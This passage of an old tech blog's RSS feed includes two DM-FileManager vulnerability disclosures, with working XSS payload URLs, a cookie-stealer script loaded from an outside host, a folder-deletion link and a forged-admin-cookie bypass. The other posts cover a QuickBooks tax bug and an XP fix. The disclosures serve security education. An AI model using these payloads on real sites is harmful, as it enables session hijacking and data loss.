			<a href="http://reddit.com/submit?url=http://blog.ndarkness.com/blog/441/wordpress-sites-hacked-in-bulk/&amp;title=Wordpress+Sites+Hacked+in+Bulk" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://blog.ndarkness.com/blog/441/wordpress-sites-hacked-in-bulk/&amp;t=Wordpress+Sites+Hacked+in+Bulk" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-technorati">
			<a href="http://technorati.com/faves?add=http://blog.ndarkness.com/blog/441/wordpress-sites-hacked-in-bulk/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Wordpress+Sites+Hacked+in+Bulk+-+http://tinyurl.com/2bwopoq&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://blog.ndarkness.com/blog/441/wordpress-sites-hacked-in-bulk/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

]]></content:encoded>
			<wfw:commentRss>http://blog.ndarkness.com/blog/441/wordpress-sites-hacked-in-bulk/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Intuit QuickBooks Discount Error Goes Unfixed</title>
		<link>http://blog.ndarkness.com/blog/410/intuit-quickbooks-discount-error-goes-unfixed/</link>
		<comments>http://blog.ndarkness.com/blog/410/intuit-quickbooks-discount-error-goes-unfixed/#comments</comments>
		<pubDate>Fri, 07 May 2010 03:57:41 +0000</pubDate>
		<dc:creator>safety</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Utilities]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[Error]]></category>
		<category><![CDATA[Intuit]]></category>
		<category><![CDATA[QuickBooks]]></category>
		<category><![CDATA[XP]]></category>

		<guid isPermaLink="false">http://blog.ndarkness.com/?p=410</guid>
		<description><![CDATA[Unless you live in a secluded cave in the middle of nowhere, you have undoubtedly heard of a little program called QuickBooks by Intuit. This program comes in a variety of different flavors to suit your personal and/or business needs. This software can be surprisingly simple to use with little to no effort. In a [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://blog.ndarkness.com/wp-content/blogs.dir/1/files/2010/05/Math.png" height="200" width="200" style="float:left;vertical-align:top;padding-left: 10px;padding-bottom: 10px" />Unless you live in a secluded cave in the middle of nowhere, you have undoubtedly heard of a little program called <a href="http://quickbooks.intuit.com/">QuickBooks</a> by Intuit.  This program comes in a variety of different flavors to suit your personal and/or business needs.  This software can be surprisingly simple to use with little to no effort.</p>
<p>In a few cases when I invoice a customer, I will charge them for a product at full price and then a few lines down discount the product to the agreed upon selling price.  This helps me to demonstrate the value associated with the services I provide and also allows me to charge more later if the circumstances change.  QuickBooks has a special item that is setup for this very discount function.  </p>
<p>During my normal day-to-day operations, I received a phone call from a customer that was unable to determine how I arrived at a sales tax figure.  Thinking this was a simple error on the customer’s behalf I pulled up the invoice, ran the figures and was shocked when I realized that the math absolutely did not work.  Wanting to get to the bottom of this, I asked to call the customer back and began trying to figure the problem out.  After working with the problem for a few moments I remembered that my company has a full service plan and decided to call Intuit to report the problem.  After jumping through several hoops and being transferred to a level 2 support member, I was told that this was expected behavior.  The invoice in question had taxable and non-taxable items on it with the discount appearing at the very bottom of the invoice.  She explained that the QuickBooks calculator added all the items up as it went along and when it encountered a discount it treated it as a payment and reduced the previous line items by a percentage.  </p>
<p>Let see an example:</p>
<p>Our tax amount will be 8%.<br />
Now we have an item that costs $1 and is taxable: $1 x 8% = $1.08<br />
Another item for $1 that is not taxable: $1 x 0% = $1<br />
A discount of $1 that is also taxable: $1.08 + $1 = 2.08 &#8211; $1.08 = $1</p>
<p>Now here is a screen shot from QuickBooks with the same problem:<br />
(<a href="http://blog.ndarkness.com/wp-content/blogs.dir/1/files/2010/05/QB-Error.png">Click to enlarge</a>)<a href="http://blog.ndarkness.com/wp-content/blogs.dir/1/files/2010/05/QB-Error.png"><img src="http://blog.ndarkness.com/wp-content/blogs.dir/1/files/2010/05/QB-Error.png" height="200" width="475" /></a></p>
<p>As you can see, QuickBooks manages to figure this total to be $1.04.  She then explained that the work around to this problem was to add all of the taxable items first, then use the taxable discount and finally add the non-taxable items and a non-taxable discount if needed.  I asked if this was going to be improved and was told that I could submit this as a suggestion for a future version as an improvement.</p>
<p>This just goes to show you that you can&#8217;t always trust shiny software even if you pay for it and you should always double check your math.</p>
<small>GHTime Code(s): 64a48&nbsp;nc&nbsp;08e28&nbsp;</small>

<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-enjoy">
<ul class="socials">
		<li class="shr-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://blog.ndarkness.com/blog/410/intuit-quickbooks-discount-error-goes-unfixed/&amp;title=Intuit+QuickBooks+Discount+Error+Goes+Unfixed" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://blog.ndarkness.com/blog/410/intuit-quickbooks-discount-error-goes-unfixed/&amp;title=Intuit+QuickBooks+Discount+Error+Goes+Unfixed" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://blog.ndarkness.com/blog/410/intuit-quickbooks-discount-error-goes-unfixed/&amp;title=Intuit+QuickBooks+Discount+Error+Goes+Unfixed" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-slashdot">
			<a href="http://slashdot.org/bookmark.pl?url=http://blog.ndarkness.com/blog/410/intuit-quickbooks-discount-error-goes-unfixed/&amp;title=Intuit+QuickBooks+Discount+Error+Goes+Unfixed" rel="nofollow" class="external" title="Submit this to SlashDot">Submit this to SlashDot</a>
		</li>
		<li class="shr-diigo">
			<a href="http://www.diigo.com/post?url=http://blog.ndarkness.com/blog/410/intuit-quickbooks-discount-error-goes-unfixed/&amp;title=Intuit+QuickBooks+Discount+Error+Goes+Unfixed&amp;desc=Unless%20you%20live%20in%20a%20secluded%20cave%20in%20the%20middle%20of%20nowhere%2C%20you%20have%20undoubtedly%20heard%20of%20a%20little%20program%20called%20QuickBooks%20by%20Intuit.%20%20This%20program%20comes%20in%20a%20variety%20of%20different%20flavors%20to%20suit%20your%20personal%20and%2For%20business%20needs.%20%20This%20software%20can%20be%20surprisingly%20simple%20to%20use%20with%20little%20to%20" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://blog.ndarkness.com/blog/410/intuit-quickbooks-discount-error-goes-unfixed/&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://blog.ndarkness.com/blog/410/intuit-quickbooks-discount-error-goes-unfixed/&amp;t=Intuit+QuickBooks+Discount+Error+Goes+Unfixed" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="shr-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://blog.ndarkness.com/blog/410/intuit-quickbooks-discount-error-goes-unfixed/&amp;bm_description=Intuit+QuickBooks+Discount+Error+Goes+Unfixed&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="shr-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://blog.ndarkness.com/blog/410/intuit-quickbooks-discount-error-goes-unfixed/&amp;title=Intuit+QuickBooks+Discount+Error+Goes+Unfixed" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="shr-reddit">
			<a href="http://reddit.com/submit?url=http://blog.ndarkness.com/blog/410/intuit-quickbooks-discount-error-goes-unfixed/&amp;title=Intuit+QuickBooks+Discount+Error+Goes+Unfixed" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://blog.ndarkness.com/blog/410/intuit-quickbooks-discount-error-goes-unfixed/&amp;t=Intuit+QuickBooks+Discount+Error+Goes+Unfixed" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-technorati">
			<a href="http://technorati.com/faves?add=http://blog.ndarkness.com/blog/410/intuit-quickbooks-discount-error-goes-unfixed/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Intuit+QuickBooks+Discount+Error+Goes+Unfixed+-+http://tinyurl.com/2f43m4u&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://blog.ndarkness.com/blog/410/intuit-quickbooks-discount-error-goes-unfixed/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

]]></content:encoded>
			<wfw:commentRss>http://blog.ndarkness.com/blog/410/intuit-quickbooks-discount-error-goes-unfixed/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>DM-FileManager 3.9.9 XSS Vulnerability</title>
		<link>http://blog.ndarkness.com/blog/395/dm-filemanager-3-9-9-xss-vulnerability/</link>
		<comments>http://blog.ndarkness.com/blog/395/dm-filemanager-3-9-9-xss-vulnerability/#comments</comments>
		<pubDate>Sun, 31 Jan 2010 03:03:16 +0000</pubDate>
		<dc:creator>safety</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[DM-FileManager]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://blog.ndarkness.com/?p=395</guid>
		<description><![CDATA[The nDarkness community has recently been working with the wonderful developers over at DutchMonkey.com to review and point out security flaws in some of their freely available software. During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that [...]]]></description>
			<content:encoded><![CDATA[<p>The nDarkness community has recently been working with the wonderful developers over at <a href="http://dutchmonkey.com" target="_blank">DutchMonkey.com</a> to review and point out security flaws in some of their freely available software.</p>
<p>During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes.  It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.</p>
<p>DM-FileManager 3.9.9 and below is vulnerable to XSS via the message variable not being properly sanitized.</p>
<p>This example shows nDarkness.com in an iframe within the login page:</p>
<pre class="brush: xml; auto-links: false;">
http://localhost/~safety/dm-filemanager/login.php?referrer=/&amp;amp;amp;message=&amp;amp;lt;p align=center&amp;amp;gt;&amp;amp;lt;iframe src=http://ndarkness.com width=100% height=800&amp;amp;gt;&amp;amp;lt;/iframe&amp;amp;gt;&amp;amp;lt;/p&amp;amp;gt;
</pre>
<p>Here is a url encoded version:</p>
<pre class="brush: xml; auto-links: false;">

http://localhost/~safety/dm-filemanager/login.php?referrer=/&amp;amp;amp;message=%3C%70%20%61%6C%69%67%6E%3D%63%65%6E%74%65%72%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%20%77%69%64%74%68%3D%31%30%30%25%20%68%65%69%67%68%74%3D%38%30%30%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%70%3E
</pre>
<p>and one step farther is the cookie stealer script:</p>
<pre class="brush: xml; auto-links: false;">
http://localhost/~safety/dm-filemanager/login.php?referrer=/&amp;amp;amp;message=&amp;amp;lt;SCRIPT SRC=http://blog.ndarkness.com/get-cookie.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;
</pre>
<p>Here is a url encoded version:</p>
<pre class="brush: xml; auto-links: false;">

http://localhost/~safety/dm-filemanager/login.php?message=%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%62%6C%6F%67%2E%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%2F%67%65%74%2D%63%6F%6F%6B%69%65%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E
</pre>
<p>A common exploit for this would be to make up a bug report and alert the site owner of the situation in the hopes that they were logged in when they clicked the link above.  The next step would be to use session hijacking to steal the user&#8217;s session.</p>
<p>Another option is to call the delete folder ajax.php command and let the user delete directories off of their site.</p>
<pre class="brush: xml; auto-links: false;">

http://localhost/~safety/dm-filemanager/login.php?referrer=/&amp;amp;amp;message=http://localhost/~safety/dm-filemanager/ajax.php?currdir=/safety/Sites/wp/&amp;amp;amp;rmdir=yes&amp;amp;amp;folder=/safety/Sites/wp/wp-admin&amp;amp;amp;dir=wp-admin
</pre>
<p><a href="http://www.dutchmonkey.com/?file=/products-dm-filemanager.html" target="_blank">DM-Filemanager</a> users should not follow untrusted links and should upgrade to the latest version.</p>
<small>GHTime Code(s): 262b5&nbsp;e4f3d&nbsp;f515c&nbsp;nc&nbsp;</small>

<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-enjoy">
<ul class="socials">
		<li class="shr-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://blog.ndarkness.com/blog/395/dm-filemanager-3-9-9-xss-vulnerability/&amp;title=DM-FileManager+3.9.9+XSS+Vulnerability" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://blog.ndarkness.com/blog/395/dm-filemanager-3-9-9-xss-vulnerability/&amp;title=DM-FileManager+3.9.9+XSS+Vulnerability" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://blog.ndarkness.com/blog/395/dm-filemanager-3-9-9-xss-vulnerability/&amp;title=DM-FileManager+3.9.9+XSS+Vulnerability" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-slashdot">
			<a href="http://slashdot.org/bookmark.pl?url=http://blog.ndarkness.com/blog/395/dm-filemanager-3-9-9-xss-vulnerability/&amp;title=DM-FileManager+3.9.9+XSS+Vulnerability" rel="nofollow" class="external" title="Submit this to SlashDot">Submit this to SlashDot</a>
		</li>
		<li class="shr-diigo">
			<a href="http://www.diigo.com/post?url=http://blog.ndarkness.com/blog/395/dm-filemanager-3-9-9-xss-vulnerability/&amp;title=DM-FileManager+3.9.9+XSS+Vulnerability&amp;desc=The%20nDarkness%20community%20has%20recently%20been%20working%20with%20the%20wonderful%20developers%20over%20at%20DutchMonkey.com%20to%20review%20and%20point%20out%20security%20flaws%20in%20some%20of%20their%20freely%20available%20software.%0D%0A%0D%0ADuring%20this%20review%20process%2C%20there%20were%20several%20issues%20found%20and%20we%20will%20be%20posting%20them%20in%20the%20coming%20weeks%20fo" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://blog.ndarkness.com/blog/395/dm-filemanager-3-9-9-xss-vulnerability/&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://blog.ndarkness.com/blog/395/dm-filemanager-3-9-9-xss-vulnerability/&amp;t=DM-FileManager+3.9.9+XSS+Vulnerability" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="shr-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://blog.ndarkness.com/blog/395/dm-filemanager-3-9-9-xss-vulnerability/&amp;bm_description=DM-FileManager+3.9.9+XSS+Vulnerability&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="shr-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://blog.ndarkness.com/blog/395/dm-filemanager-3-9-9-xss-vulnerability/&amp;title=DM-FileManager+3.9.9+XSS+Vulnerability" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="shr-reddit">
			<a href="http://reddit.com/submit?url=http://blog.ndarkness.com/blog/395/dm-filemanager-3-9-9-xss-vulnerability/&amp;title=DM-FileManager+3.9.9+XSS+Vulnerability" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://blog.ndarkness.com/blog/395/dm-filemanager-3-9-9-xss-vulnerability/&amp;t=DM-FileManager+3.9.9+XSS+Vulnerability" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-technorati">
			<a href="http://technorati.com/faves?add=http://blog.ndarkness.com/blog/395/dm-filemanager-3-9-9-xss-vulnerability/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=DM-FileManager+3.9.9+XSS+Vulnerability+-+http://tinyurl.com/yclmryt&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://blog.ndarkness.com/blog/395/dm-filemanager-3-9-9-xss-vulnerability/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

]]></content:encoded>
			<wfw:commentRss>http://blog.ndarkness.com/blog/395/dm-filemanager-3-9-9-xss-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DM-FileManager 3.9.6 Cookie Injection and Authorization Bypass Vulnerability</title>
		<link>http://blog.ndarkness.com/blog/318/dm-filemanager-3-9-6-cookie-injection-and-authorization-bypass-vulnerability/</link>
		<comments>http://blog.ndarkness.com/blog/318/dm-filemanager-3-9-6-cookie-injection-and-authorization-bypass-vulnerability/#comments</comments>
		<pubDate>Wed, 09 Dec 2009 23:36:07 +0000</pubDate>
		<dc:creator>safety</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[Privacy]]></category>
		<category><![CDATA[Cookie Injection]]></category>
		<category><![CDATA[DM-FileManager]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Vulnerability]]></category>

		<guid isPermaLink="false">http://blog.ndarkness.com/?p=318</guid>
		<description><![CDATA[The nDarkness community has recently been working with the wonderful developers over at DutchMonkey.com to review and point out security flaws in some of their freely available software. During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that [...]]]></description>
			<content:encoded><![CDATA[<p>The nDarkness community has recently been working with the wonderful developers over at <a href="http://dutchmonkey.com" target="_blank">DutchMonkey.com</a> to review and point out security flaws in some of their freely available software.</p>
<p>During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes.  It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.</p>
<p>The first major <a href="http://blog.ndarkness.com/blog/225/wordpress-dm-albums-version-2-0-critical-vulnerability/" target="_blank">issue</a> we found was with <a href="http://www.dutchmonkey.com/?file=/products-dm-albums.html" target="_blank">DM-Albums</a> version 2.0.  After reviewing this software and helping to add greater support for WPMU installations, we moved on to <a href="http://www.dutchmonkey.com/?file=/products-dm-filemanager.html" target="_blank">DM-FileManager</a> version 3.9.6.  The fist major issue we found with this software prompted us to take a deeper look at the authorization model used by this file manager software.  Below is the vulnerable code and the method used to exploit it.  Please be aware that this has since been fixed and is no longer vulnerable.</p>
<p>I discovered that cookie variables were being used to determine a users ability to access certain features of the software.  The cookies I found that mattered were:</p>
<pre class="brush: jscript; highlight: [1];">
GROUP=ADMINISTRATORS; GROUPID=1;
</pre>
<p>The group id cookie gives you the admin.php button (footer.php, line 49) &#8211; <em>Not necessary but it was a start</em>.</p>
<pre class="brush: php; first-line: 49; gutter: true; highlight: [49];">
if($GROUPID == 1)
{
	print(&quot; &lt;a href=\&quot;admin.php\&quot; class=\&quot;admin\&quot;&gt;&lt;img src=\&quot;ui/$USERINTERFACE/png/admin.png\&quot; border=\&quot;0\&quot; height=\&quot;15\&quot;/&gt;&lt;/a&gt; &quot;);
}
</pre>
<p>Being in the administrator group (admin.php, line 116) lets you use the admin.php page.</p>
<pre class="brush: php; first-line: 116; gutter: true; highlight: [116];">
if($GROUP != &quot;ADMINISTRATORS&quot;) redirect(&quot;/?currdir=$currdir&quot;);
</pre>
<p>To exploit this we used javascript injection.  From the log in page I entered the following in the address bar and reloaded the page:</p>
<pre class="brush: jscript; highlight: [1];">
javascript:void(document.cookie=&quot;GROUP=ADMINISTRATORS&quot;);void(document.cookie=&quot;GROUPID=1&quot;);
</pre>
<p>When the page reloaded, the admin button was in the footer of the page and it allowed me to use the admin.php page.  Once in the admin interface you have full control of the file manager software and can for example, change the admins email address to yours and use the forgot password feature to receive the admins unencrypted password (more on this issue in future posts).</p>
<p>All <a href="http://www.dutchmonkey.com/?file=/products-dm-filemanager.html" target="_blank">DM-FileManager</a> users are strongly encouraged to upgrade their software to the latest version.</p>
<small>GHTime Code(s): b0b5f&nbsp;nc&nbsp;</small>

<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-enjoy">
<ul class="socials">
		<li class="shr-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://blog.ndarkness.com/blog/318/dm-filemanager-3-9-6-cookie-injection-and-authorization-bypass-vulnerability/&amp;title=DM-FileManager+3.9.6+Cookie+Injection+and+Authorization+Bypass+Vulnerability" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://blog.ndarkness.com/blog/318/dm-filemanager-3-9-6-cookie-injection-and-authorization-bypass-vulnerability/&amp;title=DM-FileManager+3.9.6+Cookie+Injection+and+Authorization+Bypass+Vulnerability" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://blog.ndarkness.com/blog/318/dm-filemanager-3-9-6-cookie-injection-and-authorization-bypass-vulnerability/&amp;title=DM-FileManager+3.9.6+Cookie+Injection+and+Authorization+Bypass+Vulnerability" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-slashdot">
			<a href="http://slashdot.org/bookmark.pl?url=http://blog.ndarkness.com/blog/318/dm-filemanager-3-9-6-cookie-injection-and-authorization-bypass-vulnerability/&amp;title=DM-FileManager+3.9.6+Cookie+Injection+and+Authorization+Bypass+Vulnerability" rel="nofollow" class="external" title="Submit this to SlashDot">Submit this to SlashDot</a>
		</li>
		<li class="shr-diigo">
			<a href="http://www.diigo.com/post?url=http://blog.ndarkness.com/blog/318/dm-filemanager-3-9-6-cookie-injection-and-authorization-bypass-vulnerability/&amp;title=DM-FileManager+3.9.6+Cookie+Injection+and+Authorization+Bypass+Vulnerability&amp;desc=The%20nDarkness%20community%20has%20recently%20been%20working%20with%20the%20wonderful%20developers%20over%20at%20DutchMonkey.com%20to%20review%20and%20point%20out%20security%20flaws%20in%20some%20of%20their%20freely%20available%20software.%0D%0A%0D%0ADuring%20this%20review%20process%2C%20there%20were%20several%20issues%20found%20and%20we%20will%20be%20posting%20them%20in%20the%20coming%20weeks%20fo" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://blog.ndarkness.com/blog/318/dm-filemanager-3-9-6-cookie-injection-and-authorization-bypass-vulnerability/&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://blog.ndarkness.com/blog/318/dm-filemanager-3-9-6-cookie-injection-and-authorization-bypass-vulnerability/&amp;t=DM-FileManager+3.9.6+Cookie+Injection+and+Authorization+Bypass+Vulnerability" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="shr-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://blog.ndarkness.com/blog/318/dm-filemanager-3-9-6-cookie-injection-and-authorization-bypass-vulnerability/&amp;bm_description=DM-FileManager+3.9.6+Cookie+Injection+and+Authorization+Bypass+Vulnerability&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="shr-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://blog.ndarkness.com/blog/318/dm-filemanager-3-9-6-cookie-injection-and-authorization-bypass-vulnerability/&amp;title=DM-FileManager+3.9.6+Cookie+Injection+and+Authorization+Bypass+Vulnerability" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="shr-reddit">
			<a href="http://reddit.com/submit?url=http://blog.ndarkness.com/blog/318/dm-filemanager-3-9-6-cookie-injection-and-authorization-bypass-vulnerability/&amp;title=DM-FileManager+3.9.6+Cookie+Injection+and+Authorization+Bypass+Vulnerability" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://blog.ndarkness.com/blog/318/dm-filemanager-3-9-6-cookie-injection-and-authorization-bypass-vulnerability/&amp;t=DM-FileManager+3.9.6+Cookie+Injection+and+Authorization+Bypass+Vulnerability" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-technorati">
			<a href="http://technorati.com/faves?add=http://blog.ndarkness.com/blog/318/dm-filemanager-3-9-6-cookie-injection-and-authorization-bypass-vulnerability/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=DM-FileManager+3.9.6+Cookie+Injection+and+Authorization+Bypass+Vulnerability+-+http://tinyurl.com/ygm3hta&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://blog.ndarkness.com/blog/318/dm-filemanager-3-9-6-cookie-injection-and-authorization-bypass-vulnerability/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

]]></content:encoded>
			<wfw:commentRss>http://blog.ndarkness.com/blog/318/dm-filemanager-3-9-6-cookie-injection-and-authorization-bypass-vulnerability/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Windows XP Roaming Profile Synchronization Issues</title>
		<link>http://blog.ndarkness.com/blog/307/windows-xp-roaming-profile-synchronization-issues/</link>
		<comments>http://blog.ndarkness.com/blog/307/windows-xp-roaming-profile-synchronization-issues/#comments</comments>
		<pubDate>Mon, 09 Nov 2009 18:52:17 +0000</pubDate>
		<dc:creator>safety</dc:creator>
				<category><![CDATA[Windows]]></category>
		<category><![CDATA[Error]]></category>
		<category><![CDATA[XP]]></category>

		<guid isPermaLink="false">http://blog.ndarkness.com/?p=307</guid>
		<description><![CDATA[Roaming profiles allow us to access files that we often use on any computer joined to the network, easily replace old computers, and provide greater network security. There are on occasion, special circumstances that cause the log-on/log-off synchronization process of these profiles to fail. Generally when this happens the icon pictured fourth from the left [...]]]></description>
			<content:encoded><![CDATA[<p>Roaming profiles allow us to access files that we often use on any computer joined to the network, easily replace old computers, and provide greater network security.  There are on occasion, special circumstances that cause the log-on/log-off synchronization process of these profiles to fail.  Generally when this happens the icon pictured fourth from the left below will appear in the task bar.</p>
<p><img src="http://blog.ndarkness.com/files/2009/11/taskbar.jpg" alt="Taskbar Image" width="262" height="42" class="aligncenter size-full wp-image-308" /></p>
<p>This causes your roaming profile to refuse to load or breaks NetBIOS connections even after a reboot of the system.  You are still able to connect to network shares if you use the ip address of the network computer(s).  To correct this problem, go to My Computer=&gt;Tools=&gt;Folder Options=&gt;Offline Files.  This will open the screen pictured below.</p>
<p><img src="http://blog.ndarkness.com/files/2009/11/offline-files.jpg" alt="Offline Files Dialog" width="300" height="375" class="aligncenter size-full wp-image-309" /></p>
<p>Now what you need to do is hold down Ctrl+Shift and click on Delete Files.  Answer yes to the confirmation prompt, click ok and then restart your computer.  After the restart, you will find that your profile loads normally and there are no more connection issues involving NetBIOS names.</p>
<small>GHTime Code(s): a6f56&nbsp;c3749&nbsp;ab27a&nbsp;</small>

<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-enjoy">
<ul class="socials">
		<li class="shr-stumbleupon">
